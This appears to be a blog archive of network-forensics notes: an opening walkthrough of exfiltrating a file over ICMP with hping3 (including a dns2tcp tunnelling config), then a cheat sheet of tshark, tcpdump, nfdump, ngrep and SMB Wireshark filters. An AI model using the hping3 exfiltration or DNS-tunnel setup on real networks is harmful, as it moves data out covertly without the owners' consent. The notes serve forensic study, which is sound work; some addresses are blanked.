Maandelijks archief: juni 2016

Data exfiltration over ICMP

hping3 using kali linux

-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95
HPING (eth0 icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip= ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip= ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip= ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip= ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in file send “dns2tcp.txt”

root@kali:~# cat dns2tcp.txt

cat dns2tcpdrc

listen =
port = 53
user = nobody
chroot = /tmp/
domain =
resources = ssh:
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on receiving end using Wireshark


icmp display filter


First session contains first part of the original file


Second session the rest of the file etc.

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr


tshark -r file -Y  <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort –nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ‘ contains “google” and http.request’

  • Determine POST to domain

tshark -n -r /cases/*.pcap -Y ‘ contains “dropbox.xom” and http.request.method == “POST”‘

  • Observe content in frame number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’ -T fields -e

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y ‘’ -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web url requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y ‘http.request.uri contains “dropbox”‘


md5sum cases.pcapl


sudo tcpdump -n -i eth0 -s 0 “arp”

sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net”


  • List pcap filename/md5/start/end – capture times

capinfos -T -H -a -e *.pcap /cases/*


editcap -A ‘2015-11-15 00:00:00’ -B ‘2015-11-16 00:00:00:00’ /cases/*.pcap ~/smaller.pcap


  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain base64 code from follow stream in wireshark and save to file

cat base64-from-url.txt | > native-base64.txt

decode base64 data in a new file

base64 -di native-base64.txt > decode-base64.bin

  • check intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe


sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and contains “google”

http.request.method == “post” and contains “”


  • Order by amount of bytes, Aggregate on proto type

nfdump -O bytes -o extended -R cases/ ‘ip’ -A proto

  • Show only session with SYN flag, order by packets, aggregate scr & dst ip’s

nfdump -O packets -R cases/ -A srcip,dstip ‘proto tcp and src ip and flags S and not flags AFRPU’

  • Example with custom format and filer

nfdump -O packets -A dstip -t ‘2015/07/15-2015/08/15’ -R cases/ -o ‘fmt:%da %pkt %fl %bpp’ ‘proto tcp and src ip and flags S and not flags AFRPU and (dst ip or dst ip or dst ip’

  • Output formats

-o long, extended

-o “fmt:%sa %da”

Tag Description Tag Description
%ts Start Time – first seen %in Input Interface num
%te End Time – last seen %out Output Interface num
%td Duration %pkt Packets
%pr Protocol %byt Bytes
%sa Source Address %fl Flows
%da Destination Address %pkt Packets
%sap Source Address:Port %flg TCP Flags
%dap Destination Address:Port%tos %tos Tos
%sp Source Port %bps bps – bits per second
%dp Destination Port %pps pps – packets per second
%sas Source AS %bpp bps – Bytes per package
%das Destination AS    

-B flow direction based on port number >1024 client <1024 server

nfdump -B -O tstart -o extended -R 2013/ -o ‘fmt:%ts %te %sa %da %d’ ‘proto tcp and src ip and flags S and not flags AFRPU’





–enable referrer

SMB protocol Wirieshark filters

SMB sessions active untill:

-The network connection times out

-The users closes the session

-The user de-authenticates

-The connection fails a server-side security check

Protocal Negotiation  “smb.cmd == 0x72”

LANMAN/ NTLM negotiation

Session Establishment   “smb.cmd == 0x73”

The spnego.negResult field indicates if authentication was successfull result = 0x00

Process ID # gives indication if authentication is initiated by a core system <1000 or user level process >1000

All sessions are uniquely identified by the Multiplex ID so client and server can pair reponse packets

When authentication is successful a USER ID is added which is only valid during the same SMB session

Accessing Service “smb.cmd == 0x75”

Request access to resource

Server checks, if successfull a Tree ID is added

Network Directory  “smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004”

Opening a file “smb.cmd == 0xa2”

If a client is permitted access to a file, the server returns a FID ID. This value should not be used to track file access instead use:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request        “smb.cmd == 0xa2” and !smb.fid and smb.file

Locking file for access     “smb.cmd == 0x24”

Reading from file             “smb.cmd == 0x2e”

Closing a file                       “smb.cmd == 0x04”

Tree Disconnect               “smb.cmd == 0x71”

Uses corresponding Tree ID

Logoff                                   “smb.cmd == 0x74”

Uses corresponding UID & PID

Process ID == 996 == 0x03e4
User ID smb.uid    
Tree ID smb.tid    
File ID smb.fid    
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2

Collecting log evidence

Firewall files





IDS files










-d                            destination ip

-i                             input interface

-o                            output interface

-p                            layer 4 proto

–dport                                 destination port

–syn                      match packets with only SYN flags

-j LOG                   Log matched traffic

-j REJECT              Reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.type == 1’ –T fields –e ip.src –e ssl.record.version –e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk ‘{print $3}’ | sort | uniq –c | sort –nr

  • Identify SSL certificate subject

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.certificate’ –T fields –E separator=\ | -E aggregator=\ | -e x509ce.dNSName –e x509sat.teletexString –e x509sat.uTF8String –e x509sat.universalString –e x509sat.IA5String | tr –s \ | ‘\n’ | sort | uniq –c | sort –nr


  • Search PCAP for strings

ngrep -I dump6.pcap -w ‘root’ -N -t –q

  • Search PCAP for hex value

ngrep -I dump6.pcap  -xX ‘0xc5d5e5f55666768696a6b6c6d6e6’ -N -t –q


  • Extract files (auto file carving) from pcap

tcpxtract -f dump3.pcap